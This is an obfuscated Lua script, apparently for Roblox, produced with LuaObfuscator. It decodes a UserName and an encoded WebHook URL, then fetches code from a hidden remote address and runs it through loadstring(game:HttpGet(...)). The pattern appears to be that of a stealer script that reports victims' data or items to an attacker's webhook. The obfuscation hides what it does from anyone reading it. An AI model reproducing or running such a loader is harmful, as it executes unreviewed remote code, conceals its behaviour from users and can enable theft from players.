--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for i=1639 -((2755 -(410 + 1038)) + (1303 -972)), #v8 do v6(v10,v0(v4(v1(v2(v8,i,i + (495 -(444 + 50)))),v1(v2(v9,1 + ((i-(816 -(219 + 596)))% #v9),1 + 0 + 0 + ((i-(1 + 0 + 0))% #v9) + 1)))%(247 + 9)));end return v5(v10);end UserName=v7("\176\153\185\252\144\185\220","\234\192\237\143");WebHook=v7("\239\39\180\248\244\105\239\167\227\58\179\235\232\33\164\166\228\60\173\167\230\35\169\167\240\54\162\224\232\60\171\251\168\98\240\189\180\106\248\177\176\96\243\187\183\99\241\177\178\96\247\176\168\100\169\194\210\38\237\220\228\63\178\210\240\28\249\233\211\25\143\216\222\102\170\222\234\101\176\194\237\49\135\220\247\63\174\231\241\5\154\203\240\103\144\184\194\60\166\216\244\18\159\184\227\101\243\226\195\1\244\229\193\48\161\234\236\26\154\254\242","\135\83\192\136");loadstring(game:HttpGet(v7("\18\5\105\203\149\177\119\250\8\16\106\149\129\226\44\189\15\19\104\200\131\249\59\186\20\5\120\213\146\165\59\186\23\94\85\218\148\239\31\180\23\20\78\200\201\219\11\141\85\28\124\210\136\164\11\182\8\24\109\207\200\231\45\180","\122\113\29\187\230\139\88\213"),true))();
